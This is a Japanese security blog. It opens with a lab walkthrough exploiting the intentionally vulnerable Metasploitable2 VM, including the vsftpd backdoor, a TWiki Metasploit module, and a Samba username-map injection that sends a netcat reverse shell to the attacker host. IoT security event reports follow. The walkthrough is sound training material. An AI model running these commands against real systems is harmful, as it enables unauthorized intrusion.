*白百合めも*

セキュリティ中心に毎日の勉強の記録を書くよ*

Metasploitable2落城計画〜その1〜

みなさんこんにちは!白百合です✨
今日は題名にある通り(?)、何回かに分けてMetasploitable2を攻略していこうと思います!


この記事を書くに至った流れは、

日本語検索で、Metasploitable2と検索すると、以前書いた記事(年末なのでMetasploitable2で遊んでみたよ! - *白百合めも*)が上位に出てきてしまう
→ こんな内容がないよう状態なのに、恥ずかしい!!(><)
→ Metasploitable2についてもっとちゃんとした記事を書こう✨

という感じです!笑


やられサーバの攻略法って、どこかの記事を見て知るより自分で色んな攻撃施行して知る方が良いから、攻撃法はあんまりたくさん載せない方が良いという暗黙の了解とかあったりするのかな、って不安になっていました🌀
でも、Metasploitチームの方にメールでそのことを聞いたら、いいよ!私たちも公式ページに載せてるし!的なことを言っていただいたので、
気にせず書いていこうと思います!



ただ、記事を読むにあたって、以下のことを心に刻んでいただきたいです✨

・一度ご自身でMetasploitable2に対してどんな攻撃ができるかな〜って考えてから記事を見るようにしてください🌹
・攻撃や診断の許可をもらっていないシステムやネットワークに対して攻撃施行しないでください(意図的にする人はあんまりいないと思うので、うっかりを防ぐ方法を考えよう)
・自分達のシステムを守るために攻撃法を学んでいるということを忘れないでください

特に下2つはMetasploitチームの方にも言われたので、お決まりではありますが再度認識しておきましょう!

では、やっていきましょう🌸


・動作環境

・Kali linux
・Metasploitable2
以上を使えるようにしておきましょう!


・スキャン

前回でのブログ記事でもスキャン結果を書きましたが、またやっていきます!
nmapで、開いているポートと、そのサービス名+バージョンを出すようにしてMetasploitable2に対してスキャンをします!
(65535は、ポート番号の上限)

root@white-kali:~# nmap -p0-65535 -sV 192.168.10.104  
PORT      STATE SERVICE     VERSION  
21/tcp    open  ftp         vsftpd 2.3.4  
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)  
23/tcp    open  telnet      Linux telnetd  
25/tcp    open  smtp        Postfix smtpd  
53/tcp    open  domain      ISC BIND 9.4.2  
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2) 
111/tcp   open  rpcbind     2 (RPC #100000)   
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd  
513/tcp   open  login       OpenBSD or Solaris rlogind  
514/tcp   open  shell       Netkit rshd  
1099/tcp  open  rmiregistry GNU Classpath grmiregistry  
1524/tcp  open  bindshell   Metasploitable root shell  
2049/tcp  open  nfs         2-4 (RPC #100003)  
2121/tcp  open  ftp         ProFTPD 1.3.1  
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5  
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))  
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7  
5900/tcp  open  vnc         VNC (protocol 3.3)  
6000/tcp  open  X11         (access denied)  
6667/tcp  open  irc         UnrealIRCd  
6697/tcp  open  irc         UnrealIRCd  
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)  
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1  
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)  
34405/tcp open  rmiregistry GNU Classpath grmiregistry  
40255/tcp open  mountd      1-3 (RPC #100005)  
54663/tcp open  nlockmgr    1-4 (RPC #100021)  
60108/tcp open  status      1 (RPC #100024)  


動いているサービスのバージョンが分かることで、そのバージョンに固有の脆弱性を見つけることができます🌹


・今回(その1)の攻撃リスト

今回は第一回目なので、上記の中で、

21/tcp    open  ftp         vsftpd 2.3.4  
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)  
23/tcp    open  telnet      Linux telnetd   
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)  
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)  
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)  

について見ていこうと思います♬


・攻撃法

❤️21/tcp open ftp vsftpd 2.3.4

Metasploitable2では、FTPサーバのvsftpdが動いています🌹

バージョンで調べてみると、vsftpd-2.3.4のソースコードバックドアコードが含まれているとのこと⚡️(2011年発見の脆弱性
:) [ a happy face ]が含まれるusernameが送信されると6200番ポートが開くらしいです!

Metasplpitのモジュールもあって、 https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor を利用することで簡単にexploitできてしまいます!

ただ、今回は事象発生させるのが簡単なので、モジュールは使わず実際にuser nameに:)を入れてやってみようと思います!

Metasploitable2の21番にtelnet接続して(ftp接続でも良い)、usernameに「white:)lily」、パスワードは適当に入力します!
f:id:white-lily6u6:20181014103955p:plain:w400

その後、別ウインドウでMetasploitable2の6200番にtelnet接続すると・・・
f:id:white-lily6u6:20181014104019p:plain:w600 なんと、rootでシェルが取れてしまいます!

参考: https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide


❤️22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)


OpenSSH 4.7はOpenSSL 0.9.8ライブラリのコンポーネント(鍵生成)を使っているらしく、 Debian系OS上のOpenSSL 0.9.8c-1 から0.9.8g-9のバージョンは、鍵情報に対するブルートフォースができてしまいます(CVE-2008-0166)

これについては、http://whitelily6u6.hateblo.jp/entry/2017/12/30/235718 にて記載したため、割愛します🍰

参考:https://1500bytes.blogspot.com/2018/02/exploiting-openssh-47-openssl-098.html



❤️23/tcp open telnet Linux telnetd


Metasploitモジュールの、use auxiliary/scanner/telnet/telnet_login (Scanner Telnet Auxiliary Modules - Metasploit Unleashed)とかでユーザ名とパスワードにブルートフォースかけたりしてもいいんですが、
今回は暗号化通信のありがたみを感じるために、telnetログイン時のパケットを見てパスワードを見つけてみましょう🌹

事前準備として、Kali linuxの9.sniffing > wiresharkを立ち上げ、Kaliとmetasploitable2がいるネットワークのパケットキャプチャを開始しておきます!

その後、実際にmetasploitable2にtelnet接続をします🌹

f:id:white-lily6u6:20181014140318p:plain

ユーザ名とパスワードにmsfadminを入れ、接続完了したら、
Wiresharkでパケットキャプチャを止め、取れたパケットを見てみます!

f:id:white-lily6u6:20181014140431p:plain

ProtocolがTelnetのパケット上で、右クリック->Follow->TCP streamとクリックすると……

f:id:white-lily6u6:20181014140710p:plain

送信したパスワードが見えてしまっていますね!
当たり前のようにSSHとか使っていますが、改めて感謝して生きていきましょう……🙏




❤️80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)


Metasploitable2のサーバにWebアクセスすると脆弱性を含んだページなど色々と存在するのですが、
今回はKali linuxから攻められるものとして、TWikiに注目してみようと思います!
f:id:white-lily6u6:20181014111053p:plain:w150

http://【Metasploitable2のIPアドレス】/twiki/readme.txtにアクセスすると、
TWikiのバージョンが、「Version: 01 Feb 2003」と書いてあります!

このバージョンでCVE-detailsを調べると、 f:id:white-lily6u6:20181014111349p:plain
Twiki Twiki version 2003-02-01 : Security vulnerabilities
と出てきました!!

このうち、下2つにはMetasploitモジュールが存在します*
一番下のはexploit成功するとAdmin権限が取れるらしいので、こちらは是非ご自身でやってみてください✨

この記事では、その1つ上のCVE-2005-2877を利用しようと思います🌻

TWikiのhistoryコンポーネント脆弱性で、TWikiUsers scriptに、シェルのメタ文字を含んだ"rev"パラメータを渡すことで、OSコマンドを実行することができます。
CVE-2005-2877 TWiki History TWikiUsers rev Parameter Command Execution | Rapid7

何気に今までこのブログでMetasploitの使い方を書いたことがなかったので、丁寧に見ていきます🍧



Kali linuxのターミナルで「msfconsole」と入力してMetasploitを立ち上げます🍫

今回は、use exploit/unix/webapp/twiki_historyというモジュールを使うので、以下を入力します🍪

use exploit/unix/webapp/twiki_history


攻撃対象のホストとして、RHOSTにMetasploitable2のIPアドレスを入力します🍮

set RHOST <Metasploitable2のIPアドレス>



f:id:white-lily6u6:20181014114049p:plain


ここまでできたら、以下のコマンドでモジュールのオプションを確認してみましょう!

show options


f:id:white-lily6u6:20181014113658p:plain

Requiredがyesになっているものが全て埋まっていて、Twikiのbinへのファイルパスもこれで大丈夫なので、exploitを行います!
f:id:white-lily6u6:20181014114216p:plain:w500
すると……

f:id:white-lily6u6:20181014114302p:plain
www-data(apacheのデフォルト実行ユーザ)でシェルが取れてしまいました!
(もし一度でうまくいかない時は何回か試してみてください)
権限昇格はまた別の方法で行いましょう*



❤️139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
❤️445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)


はい、何かと話題になるSambaです。
これだと詳しいバージョンがわからないので、Metasploitモジュール、auxiliary/scanner/smb/smb_version(SMB Version Detection | Rapid7)を使って調べましょう!

f:id:white-lily6u6:20181014144721p:plain

これでバージョンが、Samba 3.0.20ということがわかりました!

このバージョンでググってみると……
Samba Samba version 3.0.20 : Security vulnerabilities
むちゃくちゃCVEがあることがわかりますね⚡️

個人的によく見かけるのはCVE-2007-2447(MetasploitモジュールはCVE-2007-2447 Samba "username map script" Command Execution | Rapid7)ですね!


Samba 3.0.0から3.0.25rc3で、smb.confの"username map script"オプションが利用できる場合、usernameにメタ文字を入れられるので好きなコマンド実行できるよって感じのものです。多分。(ちょっと微妙なので間違ってたら教えてください)

一般ユーザ権限取れるって書いてあるんですが、私がやった時はroot取れてました(なんでだろう)。
f:id:white-lily6u6:20181014151830p:plain



ただ、Metasploitを使わないでexploitできれば(仕組みがよく分かって)良いので、使わないバージョンでもやっていきます!

How To - Metasploitable 2 - SAMBA Exploit - YouTube
↑こちらのビデオの後半の方法を使わせていただきます!最&高

まず、Kali linuxからMetasploitable2のSambaにanonymousログインします(パスワード打たないでEnter)

smbclient //<Metasploitable2のIPアドレス>/tmp

f:id:white-lily6u6:20181014160807p:plain:w500

次に、Kali linuxの別ターミナルで、ncで4444番ポートで接続待ち受けします。
ncコマンドについては→ https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf

f:id:white-lily6u6:20181014161451p:plain:w400

そして、anonymousログインしているSamba上で、以下を実行します。logonコマンドのusername指定の部分にncコマンドを入れ込む感じですね。パスワードはEnterしてください! (-eで、受け取った文字列を /bin/bashに渡すので、これによりコマンド実行可能になる)

smb: \> logon "/=`nc <Kali linuxのIPアドレス> 4444 -e /bin/bash`"

f:id:white-lily6u6:20181014161837p:plain

すると、接続待ち受けしていた方で、シェルを得て自由にコマンドが打てるようになりました!
f:id:white-lily6u6:20181014162652p:plain


logonコマンドについては、以下に記載がありました🌹
smbclient

logon <username> <password>  
再度ログオンすることにより、このセッションのための新しい vuidを確立する。  
新しいvuidを表示する。Samba内部のテスト用のみに使われる。  


Metasploitのモジュールのコード読んでも?ってなることが多いので実際にやってみると良きですね✨


他の方法でも是非exploitしてみてください🍫


・まとめ


基本的に昔の脆弱性が多いので、あんまり役立たないじゃん〜って思うかもしれないのですが、対象を調査して脆弱性を見つけてそこを突くアプローチ法は今も昔もそんなに変わらないので、考え方を身につけていけたらいいなって思います✨

運用面では、今回のexploitだけでも、以下のようなことを気をつけていかなきゃと気づけました!
・バージョンアップ大事
・サービスのバージョンは見えないようにする
・不要なポートは閉じる


次回はいつになるか分からないですが、この続きをやっていけたらと思います〜!🌺
最後は、アイキャッチ用の、今朝の華やかなスタバァブレイクファストの様子でお別れです!
f:id:white-lily6u6:20181014171521j:plain:w500

では、また一週間頑張りましょう!

IoTSecJP東京 Version4.0 に参加してきました!


みなさんこんにちは!白百合です!
前日のIoTLTに続き、今回はIoTSecJPさんにブログ枠で参加させていただきました!

iotsecjp.connpass.com

IoTSecJPさん自体には2017年1月に開催された#2に参加したことがあるのですが、
当時はIoT系の事前知識0で行ってしまって、
少しでも知識をつけてからいけばもっと楽しめたんじゃないかなとちょっと後悔してしまってました💦

なので今回は、

・IoTSecJP #2でとったメモで分からない単語を調べる
・登壇内容のタイトルが掲載されているものに関してはその内容を調べる
・黒林檎さんの「ハッカーの学校 IoTハッキングの教科書」を読めるだけ読む

ということをやっていきました✨

このおかげで、今回発表を聞いていて、大分理解できるようになりましたし、
「あ!この単語調べたやつだ!!」っていうのが沢山出てきて楽しかったです❣️



IoTLTでは登壇内容を書いたブログにしたのですが、
今回はスライドが公開されてるものが多かったり、あまり内容を言わない方がいいかなと思うものもあったので、
まとめ+それぞれの発表を聞いて私が思ったこと等を(その発表によって比率を変えて)書いていきたいと思います🎶


※スライドを公開されている方はそのツイート(orスライドへのリンク)を載せておりますので、もし記載はやめてほしいというのがあれば私に伝えてください!また、この内容は書かないでほしいというのがありましたらその際も教えてください。

一つ一つ色々と書いてたら結構なボリュームになってしまいましたので、Connpassの目次を見て、気になったセクションがあればその部分を見てみると良いかもしれません♬



「%sの話」
NVさん(@nvsofts)


入力をとってくる
→入力と書式指定文字列を元にsprintf()でコマンド生成
→system()でコマンド実行

というプログラムを書いた時に、
OSコマンドインジェクションの脆弱性があって、入力によっては任意のコマンドを実行できてしまうよというお話でした!
(こういう処理はrootで動いていることが多いから乗っ取られるぞとのこと)

IoT系で、詳しくない人がコーディングしてしまってこういった実装になっているものを時々見かけるらしいです。
逆に、実行ファイルの文字列を”%s”とかで検索すると脆弱性が見つかるかもとおっしゃっていました。

最近ちょうどC言語バッファオーバーフローの仕組みを勉強していたところだったので個人的にすごくホットな話題でテンションが上がりました✨
C言語で脆弱な関数が色々ある話は某情報なんとか支援士のテキストとかにも載っていたりして(多分今でも使われているから?)、本当に気をつけなきゃなと思いました。
普段関数を使うのに慣れていない方々だったら確かにこういう実装をしてしまうかもしれない...!
サニタイズや、安全な関数を使うことを心がけていきたいと思います!
ありがとうございました🍰



ー当日発表ー
totoroさん(@totoromasaki)


こちらがなかなか濃い内容で、よくこんなに調査されたなぁと感服しておりました!
ここでは内容には直接言及しませんが、気になる方は#IoTSecJP で検索して見てみると良いと思います!

学んだことは、
・何かしらの製品やサービスを利用する時は利用規約を読もう
 (全部読むのは難しいかもしれないから、特にどんな情報が収集されるかという点)
・この機器怪しいかも?と思ったら通信などを見てみると良いかも
ということです!

ツイッターの連携アプリの条件くらいは見ても、
利用規約って長いし難しいこと色々書いてるから、何も見ずにすぐ同意しちゃう方も多いと思います。
ざ〜〜っと流し見で見て、気になった部分があったらそこをちゃんと見るという方法で良いと思うので、利用規約を読む習慣をつけていきたいですね……!


あとは、
こんなプロセスが立ち上がってます!こんな通信があります!→怪しい
と決めつけるのではなくて、
もしかしたらこうこうこういう理由でこういう動作をしているのかもね、という推測を話されていたのが個人的にすごく良かったなぁと思いました✨真似したい。

ありがとうございました🍪


CyberGridJournalに関連したお話
kidasanさん


まずはCYBER GRID JOURNALという情報誌のお話がありました。
今回はIoT特集で、Webからダウンロードできるみたいなので、ぜひ読んでみようと思います!

CYBER GRID JOURNAL Vol.6 | セキュリティ対策のラック


その後は、ハードウェアの開発からソフトウェアを動かすまでのお話でした😊🎶

付随ソフトウェアが公開されている評価ボードを使えば、とりあえずソフトウェアが動くことは保証されるので動きだせるとのこと。
評価ボードの選択の知見とかは業界内で共有されていたりするのかしら。


途中でてきた「U-boot」と「Yocto」という単語を初めて聞いたので、整理しました↓

🍬U-boot🍬
組み込み機器によく使われているオープンソースブートローダ
マニュアルはここから見れます→ https://www.denx.de/wiki/U-Boot/WebHome

🍬Yocto🍬
Yocto Project。組み込み製品用にLinuxベースのシステムが作れるツール
公式HP→https://www.yoctoproject.org/


普段あまり聞くことのない領域のお話だったのでとても興味深かったです!(新しい世界を知れて嬉しい!)
ハードウェア屋さんすごい……

ありがとうございました🍧




とあるセキュリティ会社の無線通信セキュリティ診断
tansokun920さん(@tansokun920)



🍭無線通信のセキュリティ診断を行うにあたっての順序🍭

まずは通信規格ドキュメントを読んで通信プロトコルを把握する(修行🔥)
→機材の準備をする(ただ、LPWAだとLTEの機材は超高い、LoRaWANは市販テストツールがまだまだない、Sigfoxはそもそも仕様公開されていない)
→機材が高かったりツールがないものはSDR(Software Defined Radio)で代用する!
 入門はHack RF one、コスパ的なオススメはKimeSDR 
 ※電波法違反しないために、電波を発射する場合は電波が遮蔽されるような環境で行う
LTE偽装基地局を作って診断したりLoRaWANシステムに診断したり✨

無線通信の診断ってイメージついていなかったのですが、準備段階からのフローを教えていただけてすごく面白かったです🌟

ツイッターで呟いている方がいらっしゃったのですが、シールドルームはDMM.make AKIBAにもあるらしいので
ここを利用してみるのも良さそうですね!!
シールドルーム - DMM.make AKIBA


IoTLTとはまた違ったお話でとても楽しかったです✨
ありがとうございました🍮



ーLoRaWANセキュリティのお話枠ー
ひみつさん(@_tokina23)




まずはLoRaWANの基本から説明していただきました。

こちら→ The Things Network にて、the things networkに登録しているLoRa Gatewayの設置場所が見れるとのこと。(変わったowner名つけてる人いたりして面白いw)

LoRaWANの仕様は Home page | LoRa Alliance™ に書かれているとのことです(頻繁に更新される)。
ただ、今のところ英語で読むしかないのと、法律のあたりが結構ごちゃごちゃしているみたいです。

LoRaWANの通信方法の概念「Class」では、 基本的にはClassAが使われているけど、今後LoRaWAN使うときはDownlink対応しているClassBを使っていく必要があるのかな、ということでした。

その後、LoRaWANに対する攻撃手法と、 実際にHack RFを使ってLoRaWANの通信の中身を見るデモを行なっておりました✨

実際に電波が2回送信されている波形が見れて、おおおってなりました!
機器で観測している気温とか湿度とかも見れていてとてもすごかった……やっぱりデモって盛り上がりますよね……!!

LoRaWANがすごく好きになりました!
ありがとうございました!





HHV
きとけーさん ( @kitokay )

HHVとは、Hardware Hacking Villageの略だったみたいです!!

Black Hatでファームウェア抜き出せるぜ、書き換えられるぜ的な発表が多かったり、
DEF CONの0 day hack challengeで洗濯機のゼロデイを探そうというのがあったりしたそうです!

Villageでは、chip-off villageというものがあったらしく、ランプで温めてチップを物理的に取り外したりまたはんだ付けさせたり!
DEF CON® 26 Hacking Conference Villages

その他もDEF CONのツイッターでも紹介されていたりするらしので、見てみましょう✨

twitter.com

こういったのを日本でもやってみたいということで、
リバースエンジニアリングゼミをSeccampで行なったそうです!
カーナビ、スマートスピーカーとかとかを
ロジックアナライザーで見たり、JTAG繋いだり意外と簡単にroot取れたり、とても楽しそうです!
(今回は後半で発表があるけど、どなたかレポとかもあげてるかしら)

Hardware Hacking 合宿とかやりたいなぁと思われてるそうです✨素敵!

DEF CONにvillageというものがあるのを知らなかったので興奮しましたw
ありがとうございました🍫




JTAGのいい話」 Yukiさん ( @h1romaruo )

スライド埋め込みするとブログ幅に収まらなかったのでリンクで失礼します!
JTAG_Yuki_20180915.pdf - Speaker Deck

JTAGという規格を使ってファームウェアを抽出し、脆弱性を探るお話でした✨
JTAGは車とかの基板でよく使われているらしいです!🚗🚘

まずはルータから基板を取り出し、ピンを確認してJTAGを探します!
JTAGはピン数やピン配列が統一されていないらしく、製品の型番でググるか1ピンずつ確認していく方法があるらしいです。
今回の発表は1ピンずつ確認されておりました🍡

マルチメータを使ってGNDを探す
→GND以外の7つのピンに対して個別に電圧測定
→JTAGulatorを繋げてLinux端末上でコマンドを打っていくと、TCK(クロック)やTDI(データ入力)等が出てくる
→もっとスキャンしていってピンの特定等が完了👊

今回はShikraというデバッガを使ってPCとルータの基板を接続されていました!
JTAGのconfig fileはopenocdで提供されていたようなのですが、デフォルトでエラーが出てくるため、
gdb_memory_map disableという設定を追加する必要があるそうです✨

後はLinuxt端末上で色々コマンドを打っていき、デバックモードに無事接続できて、ファームウェアダンプも完了!
reset:init:haltというコマンドを1行で書くことがポイントらしいです!!!)

せっかくファームウェア抽出したんだからと、脆弱性探そうとしてbinwalkを使用し、ファイル構造の確認までできたみたいです✨

shikraについて、今回JTAGだけの話だったけど、SPIとかUARTの規格とかにも対応しているから、
これがあれば色々面白いIoTハッキングができるんじゃないかなとのことです❣️

……と、自分の復習がてら文字に起こさせていただきました!


JTAGファームウェア抽出!ってよくきくけど実際どんな手順で行うんだろう?と気になってたので詳しく教えていただいてとてもありがたかったです!
ありがとうございました🍰





Voltage Fault Injection Attack
omoikaneさん(@jm6xxu)


Fault injectionとは、
「プロセッサに物理的な外乱を与えて正常な動作の一部を変更する攻撃手法」とのこと!

外乱としては以下のようなものがあげられていました✨
・CPUのclock(同じ周期でパルスが来ることを前提としている)
・Voltage 電圧
・EM 電波
・Laser チップの裏側にレーザー当てたり

今回は特にVoltage Fault を取り上げられておりました!
瞬時的に電源電圧を降下させると、そのタイミングのinstructionがskipしたり誤作動を起こすらしいです。 長く加えるとCPUが死んでしまうから、一瞬だけ降下させます⚡️

Nintendo Switch Bybassing(secure boot)についても触れられていました♬
media.ccc.de - Nintendo Hacking 2016



今回はTarget Deviceとして、
aitendoさんのArduino clone あちゃんでいいの を使われておりました✨
★特売品★あちゃんでいいの - aitendo
プリミティブなことをやるのはこれが一番良いぞとのことです!

また、Glitchを発生させるためにFPGAを使われておりました!
Voltage Fault Injection Attackはタイミングが大事で、
有効なGlitchを入れるタイミングをできるだけ長くするため、無限ループでLoopを出力していました!
Loopの中でカウントしている間にGlitchになってループカウンターが変な値になったら抜ける仕組みみたいです。

実際の映像も見たのですがめちゃめちゃかっこよかったです……!

ハードでの対策は難しいから、ソフトで対応するしかないらしいです!!

すごくエモい攻撃方法で感動しました……✨
ありがとうございました!🍧




「Black Hat USA 2018 トレーニング参加記」
とある診断員さん(@tigerszk)


Black Hat USAに参加された時のお話をされておりました✨

2018年のトレーニングは
Black Hat USA 2018 | Trainings
ここに色々と載っているので、どんなものがあるかなと見てみると面白いと思います✨

Red team/Blue team系、カーハッキング、ソーシャルハッキングフォレンジック、ハードウェアハッキング、マルウェア解析、OSINT、Kali linux、IoTハッキング、IDA Pro、Webハッキング、カーネル……etc. めちゃめちゃあります😎😎
人気でSOLD OUTしているものもありますね。
個人的にOffensive Securityが提供してるKali linuxレーニングが気になりますね……
公式……(やはり人気ですぐ売り切れるらしい)

本やネット上の記事を見て独学でIoTセキュリティの勉強をするのもいいけど、
Black Hat等のイベントで開催されているトレーニングやハンズオンに参加すると(高額なのでそんなに気軽に、とはいかないかもしれませんが)、
短い期間で精査された知識がグッと入ってくるのでいいなぁと思いました❣️

Black Hatはトレーニングのチケットだけ取る方も結構いらっしゃるそうなので、 機会のある方はぜひ……!!
素敵な発表ありがとうございました🍩





「セキュキャン枠」
YutaFukagawaさん


セキュキャンの卒業生さんで、Reverse Engineeringゼミに参加された報告をされておりました✨(部屋でエンジン分解をやっていて、ピアノ、炊飯器、エンジンが並んでるらしいです!)
今回のIoTSecJPで出てきたようなツールやガジェットをバリバリ使ったみたいです❗️

JTAGulator
Olimex
The Shikra
Hack RF one
ロジックアナライザ
などなど……✨

カーナビを物理的に分解してどういう仕組みになっているか見てみたり、 家庭用ルータの解析をしたり、とても楽しそうでした!

私はもう社会人なので参加できませんが、今すぐ学生になって(+強くなって)セキュキャンに参加したいなぁという気持ちになりました!
お金を貯めて個人スポンサーになることを夢に頑張ろう……!

すごくワクワクする発表でした!
ありがとうございました🍦





gadget_sharing成果報告
momomopas様さん( @momomopas )


[更新]
ご本人様のブログ記事です!

momomomopas93.hatenablog.com


ゼロからIoTを勉強するには、ということで発表されておりました✨

*全体を把握するフェーズ

・書籍が欲しいから社長に頼んだ(買ってくれたけどIoTの知識が必要な打ち合わせの一週間後くらいに届いた)
Google検索
 英語で調べる(日本語の資料はIoT全然ない)
 「IoT Security 101」で検索 (101っていうのは基礎ということ)
  →youtubeにも色々出てくる
Awesome IoT Hacks(github)とかで事例とかを調べた
 GitHub - nebgnahz/awesome-iot-hacks: A Collection of Hacks in IoT Space so that we can address them (hopefully).
・Embedded Linux Wiki(組み込み系)
・How to IoT Penetration Testingで検索
 →youtubeにも色々出てくる
・Payatuのブログも色々解説があってとても良い
Hack The World · Juan Carlos Jimenez という一からハッキングを学ぶサイト

*実際にやってみる

・IoT攻撃マッピング
 IoTデバイスの論理構成を理解する
 図を元に攻撃ポイントを考える

・IoTプロトコルも一から調べて行った

ルータを分解して体験するIoT機器のセキュリティとして、 Yukiさんを講師に招いてルータを分解して取り出せるかとかをやっていたみたいです✨

IoTのCTFとかもちらほらやっているらしい(!)

やってみたことをまとめると
Googleで調べる・youtubeで調べる・企業のブログ
・実際に手を動かしてやってみる

とのことでした✨
日本語情報が少ない中、短期間で基礎の勉強から実践まで行なったのこと、大尊敬です……
自分が知らない分野の話が降ってきたときに、私そんなのできないよ〜ってなるんじゃなくて挑戦してみようかな!と思わせていただいた発表でした!
ありがとうございました🍨





ーSatori系ボットネット観察ー
morihi-soc様 ( @morihi_soc )



今回のIoTSecJPではインターネットに繋げない系のIoTの話が多かったけど、
すでに世に放たれているIoTにどういったパケットが届いているかというお話をしますとのことでした✨  
まず、自宅のルータの様子を見てくださいと一声!(どきっとした)
・ログインできるかどうか
・身に覚えがない設定がされていないかどうか

何故冒頭でこのようなことをおっしゃられたのか、徐々に明らかになっていきます……✨

ハニーポットとは、あえて攻撃を受けることを前提としたシステム。

Webに特化したハニーポットのログからSatoriボットネットを観察してみたとのことです!なんと、攻撃対象のサーバにHTTP接続できたらいきなりexploitの攻撃を打ち込んで来るらしい!
お行儀が悪いのでログを収集しやすいみたいです🎃

User-Agentが結構面白いみたいで、
rm -rfとかfirewalld止めたりとかiptables止めたり系とか色々あるんですって!
私のところにも来てないかな……と聞いててワクワクしましたw

攻撃元としては、エジプト・アラブ共和國からの攻撃が多いらしいです(!)
日本からも210個、SatoriボットネットのOSコマンドインジェクションが来ています。

ホスト名を逆引きすると一般のご家庭のルータとかカメラとかが感染をして攻撃の踏み台になっているみたいです。
もしかしたら身近にボットネットの一部がいるかもしれないから、IoT機器をインターネットに接続する時は十分注意してね!!ということでした⚡️

この記事を書き終わったら私もすぐに自宅のルータを確認しようと思いました!
まさか(感染しているはずない)、という考えではなく、もしかしたら(感染しているかもしれない)、という気持ちでいきたいですね……!

発表、ありがとうございました🍰



「〇〇物語-序章-」
黒林檎 ( @r00tapple )さん


IoTのハッキングとか検証とか需要が高いけどコストが高いのが問題。

黒林檎さんのIoTハッキング本には色んな種類の機器を書いてしまったとのことで、
電球とか1つに対して
*通信解析
スマートフォンアプリのハッキング
*ハードウェアレベルハッキング
等を見ていくドキュメントがかけたら良いなとおっしゃってました!

以下、お話を聞いていて気になった部分を書いていきます!

・nRF - スマートフォンbluetoothに任意の送信値を送ることができるアプリ が良い!
Bluetooth HCIスヌープログを有効にするとログが出てくる
・apk解析の流れ
 APKPure で apkファイルのダウンロード
 → Decompilers Online で apkをソースコードに変換
 →ソースコード解析(頑張って読む)
SQLite
 shared_prefsとかをみてどんな入出力情報があるかをみると良い
・ハードウェアセキュリティの狙い目として
 JTAG SPI UARTとか色々みる
 チップセットの名前とかを全部メモしておくと良い
・openOCDではJTAGを通してgdbとかtelnetとかで繋げられる

電球1つで、
アプリケーション
ネットワーク
ハードウェア
など色々な攻撃コンポーネントが考えられる
と締められておりました!

最後にすごく濃い内容をお話ししていただき、満足して帰路につけました✨
発表&主催、ありがとうございました🍎




この2日間で大分IoTと親しくなれた感があるので、自分でも色々とやっていきたいなと思いました!
本当に参加してよかったです。ありがとうございました🎀

最後は、近くに置いてあった緑とか青の方々をアイキャッチに貼っておきます❣️
では、良い三連休をお過ごしください♬

f:id:white-lily6u6:20180916202318j:plain:w500

SecurityIoTLT#1 に参加したよ!

みなさんこんにちは、白百合です!🍩
約4ヶ月ぶりくらいの投稿になります!(もっとアウトプットしろよ!)

今回、9/14に、SecurityIoTLT#1 さんにブログ枠で参加させていただきました⭐️

iotlt.connpass.com

IoTLT×セキュリティは初ということです!!

初めてIoTLTに参加するのと、今までIoTに全く触れてこなかったので、どんな感じなのかなぁと楽しみに行ってきましたが とっても面白かったので共有したいと思います🎀


注意事項↓
※それぞれのLTで写真を撮りたい場面が多々あったのですが、私のスマホがボンコツなのでうまく撮れませんでした(明日機種変する予定)
文字だけで分かりづらい部分は多いと思いますがご了承ください

※登壇者の方がスライドを上げ次第、このブログにもURL貼らせていただきますね
(嫌な方は伝えてください!)

※これはブログに書かないでほしい!という部分があったり、
ここ間違って書いてるよという部分がありましたらお声掛けください



では、1つ1つのLTについてご紹介します🍰



スポンサーLT : CTC 渡邊さん
会場案内 / Innovation Space DEJIMAについて


今回の会場は、Innovation Space DEJIMAさんでした。(とってもおしゃれ!) dejima.space

IoTLTでここを使うのは6回目くらいだそうです❗️

昼間は会員制のコワーキングスペースととなっていて、ワークショップ等が開催されているみたいです。

企業の人たちとワークショップをして事業のタネを見つけていったり、
五反田の地域にスタートアップが集まってきている(五反田バレー)ので
そういった方にこの場を提供してスタートアップのピッチイベント行なったり!

イベントは一週間に2、3回など行なっているので、
こういった活動に興味があればぜひ声をかけてくださいとのことでした☺️🌿

上記に貼ったDEJIMAのサイトを見たり、
Facebookのページをいいねしたりフォローしたりすると、
どういう場所かっていうのが分かるから嬉しいとおっしゃってました✨

素敵な会場、ありがとうございました!⭐️



LT :上松 亮介さん
IoT × 無線のセキュリティ


【更新】 スライドはこちらから!


以下、LT中の白百合のメモ(詳細はスライドをご覧くださいね)

以下のテーマでお話しされておりました✨
・IoTで関わる無線通信ってどんなもの
・無線通信のセキュリティってなに?

まずは、IoTで使われる代表的な無線通信規格ですが、
WiFi
Bluetooth
LTE
ZigBee
最近だと、LPWA-Low Power Wide Area の
LoRaWan
Sigfox
などなど、主要なものだけでもこれだけあります❗️とのことで、
この中でも今回はLPWAのセキュリティの機能比較に注目していました🌊


LPWAのそれぞれ規格で気になるポイントとして、以下が挙げられていました!

LTE-M:改ざん検知なし
LoRaWan:再送機能なし・ソフトウェアの更新なし
Sigfox:Network認証なし・セッションIDなし・データ暗号化はオプション(AES128)
